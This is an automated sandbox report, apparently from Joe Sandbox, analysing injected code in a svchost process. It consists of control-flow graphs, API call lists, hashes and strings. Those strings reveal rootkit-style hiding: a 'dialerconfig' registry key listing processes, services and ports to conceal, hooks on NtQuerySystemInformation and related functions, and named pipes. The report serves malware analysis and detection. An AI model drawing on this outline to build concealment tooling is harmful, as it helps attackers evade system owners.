                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:68
                                            Total number of Limit Nodes:2
                                            execution_graph 13990 26a879c1c28 13995 26a879c1650 GetProcessHeap HeapAlloc 13990->13995 13992 26a879c1c3e Sleep SleepEx 13993 26a879c1c37 13992->13993 13993->13992 13994 26a879c15c0 StrCmpIW StrCmpW 13993->13994 13994->13993 14039 26a879c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13995->14039 13997 26a879c1678 14040 26a879c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13997->14040 13999 26a879c1689 14041 26a879c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 13999->14041 14001 26a879c1692 14042 26a879c1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14001->14042 14003 26a879c169b 14004 26a879c16b6 RegOpenKeyExW 14003->14004 14005 26a879c16e8 RegOpenKeyExW 14004->14005 14006 26a879c18ce 14004->14006 14007 26a879c1727 RegOpenKeyExW 14005->14007 14008 26a879c1711 14005->14008 14006->13993 14009 26a879c1762 RegOpenKeyExW 14007->14009 14010 26a879c174b 14007->14010 14043 26a879c12c8 RegQueryInfoKeyW 14008->14043 14013 26a879c1786 14009->14013 14014 26a879c179d RegOpenKeyExW 14009->14014 14053 26a879c104c RegQueryInfoKeyW 14010->14053 14017 26a879c12c8 16 API calls 14013->14017 14018 26a879c17d8 RegOpenKeyExW 14014->14018 14019 26a879c17c1 14014->14019 14020 26a879c1793 RegCloseKey 14017->14020 14022 26a879c1813 RegOpenKeyExW 14018->14022 14023 26a879c17fc 14018->14023 14021 26a879c12c8 16 API calls 14019->14021 14020->14014 14026 26a879c17ce RegCloseKey 14021->14026 14024 26a879c1837 14022->14024 14025 26a879c184e RegOpenKeyExW 14022->14025 14027 26a879c12c8 16 API calls 14023->14027 14028 26a879c104c 6 API calls 14024->14028 14029 26a879c1889 RegOpenKeyExW 14025->14029 14030 26a879c1872 14025->14030 14026->14018 14031 26a879c1809 RegCloseKey 14027->14031 14032 26a879c1844 RegCloseKey 14028->14032 14034 26a879c18c4 RegCloseKey 14029->14034 14035 26a879c18ad 14029->14035 14033 26a879c104c 6 API calls 14030->14033 14031->14022 14032->14025 14036 26a879c187f RegCloseKey 14033->14036 14034->14006 14037 26a879c104c 6 API calls 14035->14037 14036->14029 14038 26a879c18ba RegCloseKey 14037->14038 14038->14034 14039->13997 14040->13999 14041->14001 14042->14003 14044 26a879c1499 RegCloseKey 14043->14044 14045 26a879c1334 GetProcessHeap HeapAlloc 14043->14045 14044->14007 14046 26a879c1485 GetProcessHeap HeapFree 14045->14046 14047 26a879c135d RegEnumValueW 14045->14047 14046->14044 14051 26a879c13af 14047->14051 14049 26a879c142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14049->14051 14050 26a879c13dd GetProcessHeap HeapAlloc 14050->14051 14051->14046 14051->14047 14051->14049 14051->14050 14052 26a879c1413 GetProcessHeap HeapFree 14051->14052 14059 26a879c1554 14051->14059 14052->14049 14054 26a879c11b5 RegCloseKey 14053->14054 14057 26a879c10b9 14053->14057 14054->14009 14055 26a879c10c7 RegEnumValueW 14055->14057 14056 26a879c1149 GetProcessHeap HeapAlloc 14056->14057 14057->14054 14057->14055 14057->14056 14058 26a879c117f GetProcessHeap HeapFree 14057->14058 14058->14057 14060 26a879c156e 14059->14060 14063 26a879c15a4 14059->14063 14061 26a879c1585 StrCmpIW 14060->14061 14062 26a879c158d StrCmpW 14060->14062 14060->14063 14061->14060 14062->14060 14063->14051 14064 26a87992908 14066 26a87992936 14064->14066 14065 26a87992a2b LoadLibraryA 14065->14066 14066->14065 14067 26a87992aa7 14066->14067

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 139f86e9f2346f244d1dd68c2d1ec8f696824a443f106ae828e44e4b72836a90
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: C7711676210A50D6FB90DF62E89869D3FB4FB88B89F405111DE4D63B28EF3AC444CB05

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                            • String ID:
                                            • API String ID: 1683269324-0
                                            • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction ID: 88cb58427b91c04fa6504016e21a9484d774a83945d8fb86de941a3f11605e71
                                            • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction Fuzzy Hash: C5115B7061060182FFE1D725B94E35D7E90A7D8745F4440259A0EAB1E4EF3BC0849E43

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 0000026A879C1650: GetProcessHeap.KERNEL32 ref: 0000026A879C165B
                                              • Part of subcall function 0000026A879C1650: HeapAlloc.KERNEL32 ref: 0000026A879C166A
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C16DA
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1707
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1721
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1741
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C175C
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C177C
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1797
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17B7
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C17D2
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C17F2
                                            • Sleep.KERNEL32 ref: 0000026A879C1C43
                                            • SleepEx.KERNELBASE ref: 0000026A879C1C49
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C180D
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C182D
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1848
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C1868
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C1883
                                              • Part of subcall function 0000026A879C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026A879C18A3
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C18BE
                                              • Part of subcall function 0000026A879C1650: RegCloseKey.ADVAPI32 ref: 0000026A879C18C8
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                            • String ID:
                                            • API String ID: 1534210851-0
                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction ID: 131ff0a4b7b3627bec86245eef0d9013fb3dd59f5e4ba82e029a9078f8b5bc32
                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction Fuzzy Hash: 183130B5280A0191FFD09F36DA4935E37A4ABC4BD0F544021DE0DA76EAFF22C850CB56

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 108 26a87992908-26a87992973 call 26a87990f34 * 4 117 26a87992979-26a8799297c 108->117 118 26a87992b8b 108->118 117->118 120 26a87992982-26a87992985 117->120 119 26a87992b8d-26a87992ba9 118->119 120->118 121 26a8799298b-26a8799298e 120->121 121->118 122 26a87992994-26a879929b2 121->122 122->118 124 26a879929b8-26a879929dc call 26a87990d6c 122->124 127 26a87992a0b-26a87992a12 124->127 128 26a879929de-26a87992a09 call 26a87990d6c 124->128 130 26a87992ab2-26a87992ab9 127->130 131 26a87992a18-26a87992a25 127->131 128->127 132 26a87992b6c-26a87992b89 130->132 133 26a87992abf-26a87992ad6 130->133 131->130 135 26a87992a2b-26a87992a39 LoadLibraryA 131->135 132->119 133->132 136 26a87992adc 133->136 137 26a87992a3b-26a87992a45 135->137 138 26a87992a9d-26a87992aa5 135->138 140 26a87992ae2-26a87992af7 136->140 141 26a87992a48-26a87992a4c 137->141 138->135 142 26a87992aa7-26a87992aac 138->142 143 26a87992af9-26a87992b0a 140->143 144 26a87992b5b-26a87992b66 140->144 145 26a87992a9a 141->145 146 26a87992a4e-26a87992a52 141->146 142->130 148 26a87992b15-26a87992b19 143->148 149 26a87992b0c-26a87992b13 143->149 144->132 144->140 145->138 150 26a87992a54-26a87992a7b 146->150 151 26a87992a7d-26a87992a87 146->151 153 26a87992b24-26a87992b28 148->153 154 26a87992b1b-26a87992b22 148->154 152 26a87992b48-26a87992b59 149->152 155 26a87992a8d-26a87992a98 150->155 151->155 152->143 152->144 156 26a87992b3a-26a87992b3e 153->156 157 26a87992b2a-26a87992b38 153->157 154->152 155->141 156->152 158 26a87992b40-26a87992b43 156->158 157->152 158->152
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: 218ec7520d977380068f2feaa711e4e0a9d54bee7078138da19b5574add95528
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: 6161023270265187FFA8CF19D49876DB3D1FB48BA4F548025DA29177C5DB3AE892CB02

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 203 26a879c2cdc-26a879c2d55 call 26a879decc0 206 26a879c3090-26a879c30b3 203->206 207 26a879c2d5b-26a879c2d61 203->207 207->206 208 26a879c2d67-26a879c2d6a 207->208 208->206 209 26a879c2d70-26a879c2d73 208->209 209->206 210 26a879c2d79-26a879c2d89 GetModuleHandleA 209->210 211 26a879c2d8b-26a879c2d9b call 26a879d3090 210->211 212 26a879c2d9d 210->212 214 26a879c2da0-26a879c2dbe 211->214 212->214 214->206 217 26a879c2dc4-26a879c2de3 StrCmpNIW 214->217 217->206 218 26a879c2de9-26a879c2ded 217->218 218->206 219 26a879c2df3-26a879c2dfd 218->219 219->206 220 26a879c2e03-26a879c2e0a 219->220 220->206 221 26a879c2e10-26a879c2e23 220->221 222 26a879c2e33 221->222 223 26a879c2e25-26a879c2e31 221->223 224 26a879c2e36-26a879c2e3a 222->224 223->224 225 26a879c2e4a 224->225 226 26a879c2e3c-26a879c2e48 224->226 227 26a879c2e4d-26a879c2e57 225->227 226->227 228 26a879c2f4d-26a879c2f51 227->228 229 26a879c2e5d-26a879c2e60 227->229 230 26a879c2f57-26a879c2f5a 228->230 231 26a879c3082-26a879c308a 228->231 232 26a879c2e72-26a879c2e7c 229->232 233 26a879c2e62-26a879c2e6f call 26a879c1a14 229->233 236 26a879c2f6b-26a879c2f75 230->236 237 26a879c2f5c-26a879c2f68 call 26a879c1a14 230->237 231->206 231->221 234 26a879c2e7e-26a879c2e8b 232->234 235 26a879c2eb0-26a879c2eba 232->235 233->232 234->235 239 26a879c2e8d-26a879c2e9a 234->239 240 26a879c2eea-26a879c2eed 235->240 241 26a879c2ebc-26a879c2ec9 235->241 243 26a879c2f77-26a879c2f84 236->243 244 26a879c2fa5-26a879c2fa8 236->244 237->236 248 26a879c2e9d-26a879c2ea3 239->248 250 26a879c2eef-26a879c2ef9 call 26a879c1d28 240->250 251 26a879c2efb-26a879c2f08 lstrlenW 240->251 241->240 249 26a879c2ecb-26a879c2ed8 241->249 243->244 253 26a879c2f86-26a879c2f93 243->253 246 26a879c2fb5-26a879c2fc2 lstrlenW 244->246 247 26a879c2faa-26a879c2fb3 call 26a879c1d28 244->247 257 26a879c2fc4-26a879c2fce 246->257 258 26a879c2fe5-26a879c2fef call 26a879c3930 246->258 247->246 273 26a879c2ffa-26a879c3005 247->273 255 26a879c2ea9-26a879c2eae 248->255 256 26a879c2f43-26a879c2f48 248->256 259 26a879c2edb-26a879c2ee1 249->259 250->251 250->256 261 26a879c2f0a-26a879c2f14 251->261 262 26a879c2f2b-26a879c2f3d call 26a879c3930 251->262 263 26a879c2f96-26a879c2f9c 253->263 255->235 255->248 266 26a879c2ff2-26a879c2ff4 256->266 257->258 267 26a879c2fd0-26a879c2fe3 call 26a879c1554 257->267 258->266 259->256 268 26a879c2ee3-26a879c2ee8 259->268 261->262 271 26a879c2f16-26a879c2f29 call 26a879c1554 261->271 262->256 262->266 272 26a879c2f9e-26a879c2fa3 263->272 263->273 266->231 266->273 267->258 267->273 268->240 268->259 271->256 271->262 272->244 272->263 278 26a879c3007-26a879c300b 273->278 279 26a879c307c-26a879c3080 273->279 282 26a879c3013-26a879c302d call 26a879c86a0 278->282 283 26a879c300d-26a879c3011 278->283 279->231 284 26a879c3030-26a879c3033 282->284 283->282 283->284 287 26a879c3056-26a879c3059 284->287 288 26a879c3035-26a879c3053 call 26a879c86a0 284->288 287->279 290 26a879c305b-26a879c3079 call 26a879c86a0 287->290 288->287 290->279
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 6cffb3e72637f80e0ecca6e5675cb6c27de45b81606dbc8799dcaebf2915ee0d
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: 87B17A72210A9482EFA9DF29C4487AD77A8FB84B84F545016EE0D63794EF36C980CB42

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: 4a68258971deacf93967bbbabd61e0263a25abfb71767530d944726e65d9e7da
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 81314D72205B80DAEBA0DF61E8847ED7BA4F784744F44442ADB4E57B98EF39C648CB11
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: c019a3b977e98c8464a9c7ca51686cb19ca29057d0f9f7fa7f0392543fb84b7f
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: 7B318036214F8086EBA0CF25E84439E7BA4F788758F540116EB9D53BA8EF39C645CF01
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: e50ab53f46f43525feb9fc316cfef71cb17cf2ffafe6bbfab154a7f387decc61
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: 2FE11132B04B809AE740CF68D5882DD7FB1F385788F148156DF5E67B99DA39C51ACB01

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: 450101e3417238312508fb76fbecef92d95677056d9534776bb621f83f8ed32d
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: 645179B2204B85D3FB94CF62E54839EBBA1F788B81F048124DA8D17B14EF39C066CB41

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: 8066ad8183acf5b913f5b97166315d822d90824d6080871f6ca517cb64a4b855
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: DD31D274200A4AA4FF84EFA9EC597DC3F22F784744FC055239409331759E7ACA99DB92

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 13b7611704c3c36f7f6880a0d3d83849d3e33de2f891407fa32e3e8a6b9eb749
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: B0215736614A4083FB50CB25E40836E7FA1F389BA5F504215EA5D17AA8CF3EC189CF02

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: 5301be5536c62eb723cdb2ab7e8a703766583fcf04a52a5b40df69596fb488ec
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: A4418073214B80D7EBA0CF62E44879EBBA1F389B85F008125DB8917B54EF39D165CB04

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 318 26a879969f0-26a879969f6 319 26a879969f8-26a879969fb 318->319 320 26a87996a31-26a87996a3b 318->320 321 26a87996a25-26a87996a64 call 26a879970a0 319->321 322 26a879969fd-26a87996a00 319->322 323 26a87996b58-26a87996b6d 320->323 338 26a87996b32 321->338 339 26a87996a6a-26a87996a7f call 26a87996f34 321->339 324 26a87996a02-26a87996a05 322->324 325 26a87996a18 __scrt_dllmain_crt_thread_attach 322->325 326 26a87996b7c-26a87996b96 call 26a87996f34 323->326 327 26a87996b6f 323->327 329 26a87996a07-26a87996a10 324->329 330 26a87996a11-26a87996a16 call 26a87996fe4 324->330 333 26a87996a1d-26a87996a24 325->333 341 26a87996b98-26a87996bcd call 26a8799705c call 26a87996efc call 26a879973f8 call 26a87997210 call 26a87997234 call 26a8799708c 326->341 342 26a87996bcf-26a87996c00 call 26a87997270 326->342 331 26a87996b71-26a87996b7b 327->331 330->333 343 26a87996b34-26a87996b49 338->343 350 26a87996a85-26a87996a96 call 26a87996fa4 339->350 351 26a87996b4a-26a87996b57 call 26a87997270 339->351 341->331 352 26a87996c02-26a87996c08 342->352 353 26a87996c11-26a87996c17 342->353 370 26a87996ae7-26a87996af1 call 26a87997210 350->370 371 26a87996a98-26a87996abc call 26a879973bc call 26a87996eec call 26a87996f18 call 26a879990dc 350->371 351->323 352->353 357 26a87996c0a-26a87996c0c 352->357 358 26a87996c19-26a87996c23 353->358 359 26a87996c5e-26a87996c74 call 26a87992858 353->359 364 26a87996cff-26a87996d0c 357->364 365 26a87996c25-26a87996c2d 358->365 366 26a87996c2f-26a87996c3d call 26a879a2758 358->366 379 26a87996c76-26a87996c78 359->379 380 26a87996cac-26a87996cae 359->380 373 26a87996c43-26a87996c58 call 26a879969f0 365->373 366->373 383 26a87996cf5-26a87996cfd 366->383 370->338 391 26a87996af3-26a87996aff call 26a87997260 370->391 371->370 421 26a87996abe-26a87996ac5 __scrt_dllmain_after_initialize_c 371->421 373->359 373->383 379->380 388 26a87996c7a-26a87996c9c call 26a87992858 call 26a87996b58 379->388 381 26a87996cb5-26a87996cca call 26a879969f0 380->381 382 26a87996cb0-26a87996cb3 380->382 381->383 400 26a87996ccc-26a87996cd6 381->400 382->381 382->383 383->364 388->380 415 26a87996c9e-26a87996ca6 call 26a879a2758 388->415 408 26a87996b25-26a87996b30 391->408 409 26a87996b01-26a87996b0b call 26a87997178 391->409 405 26a87996cd8-26a87996cdf 400->405 406 26a87996ce1-26a87996cf1 call 26a879a2758 400->406 405->383 406->383 408->343 409->408 420 26a87996b0d-26a87996b1b 409->420 415->380 420->408 421->370 422 26a87996ac7-26a87996ae4 call 26a87999078 421->422 422->370
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: d9f4358a1d31489f216a376bbd794669f2cb2f33805e6d499db2f45a2d4a1307
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 2781F73170524186FBD0AB69984D79D72E0E797780F184025AA0977796EF3BC9868F03

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 425 26a879c75f0-26a879c75f6 426 26a879c75f8-26a879c75fb 425->426 427 26a879c7631-26a879c763b 425->427 428 26a879c7625-26a879c7664 call 26a879c7ca0 426->428 429 26a879c75fd-26a879c7600 426->429 430 26a879c7758-26a879c776d 427->430 448 26a879c7732 428->448 449 26a879c766a-26a879c767f call 26a879c7b34 428->449 431 26a879c7618 __scrt_dllmain_crt_thread_attach 429->431 432 26a879c7602-26a879c7605 429->432 433 26a879c776f 430->433 434 26a879c777c-26a879c7796 call 26a879c7b34 430->434 440 26a879c761d-26a879c7624 431->440 436 26a879c7607-26a879c7610 432->436 437 26a879c7611-26a879c7616 call 26a879c7be4 432->437 438 26a879c7771-26a879c777b 433->438 446 26a879c7798-26a879c77cd call 26a879c7c5c call 26a879c7afc call 26a879c7ff8 call 26a879c7e10 call 26a879c7e34 call 26a879c7c8c 434->446 447 26a879c77cf-26a879c7800 call 26a879c7e70 434->447 437->440 446->438 459 26a879c7802-26a879c7808 447->459 460 26a879c7811-26a879c7817 447->460 453 26a879c7734-26a879c7749 448->453 457 26a879c7685-26a879c7696 call 26a879c7ba4 449->457 458 26a879c774a-26a879c7757 call 26a879c7e70 449->458 475 26a879c76e7-26a879c76f1 call 26a879c7e10 457->475 476 26a879c7698-26a879c76bc call 26a879c7fbc call 26a879c7aec call 26a879c7b18 call 26a879c9cdc 457->476 458->430 459->460 464 26a879c780a-26a879c780c 459->464 465 26a879c7819-26a879c7823 460->465 466 26a879c785e-26a879c7874 call 26a879c3458 460->466 471 26a879c78ff-26a879c790c 464->471 472 26a879c7825-26a879c782d 465->472 473 26a879c782f-26a879c783d call 26a879d3358 465->473 486 26a879c7876-26a879c7878 466->486 487 26a879c78ac-26a879c78ae 466->487 478 26a879c7843-26a879c7858 call 26a879c75f0 472->478 473->478 490 26a879c78f5-26a879c78fd 473->490 475->448 498 26a879c76f3-26a879c76ff call 26a879c7e60 475->498 476->475 528 26a879c76be-26a879c76c5 __scrt_dllmain_after_initialize_c 476->528 478->466 478->490 486->487 495 26a879c787a-26a879c789c call 26a879c3458 call 26a879c7758 486->495 488 26a879c78b5-26a879c78ca call 26a879c75f0 487->488 489 26a879c78b0-26a879c78b3 487->489 488->490 507 26a879c78cc-26a879c78d6 488->507 489->488 489->490 490->471 495->487 522 26a879c789e-26a879c78a6 call 26a879d3358 495->522 515 26a879c7725-26a879c7730 498->515 516 26a879c7701-26a879c770b call 26a879c7d78 498->516 512 26a879c78d8-26a879c78df 507->512 513 26a879c78e1-26a879c78f1 call 26a879d3358 507->513 512->490 513->490 515->453 516->515 527 26a879c770d-26a879c771b 516->527 522->487 527->515 528->475 529 26a879c76c7-26a879c76e4 call 26a879c9c78 528->529 529->475
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
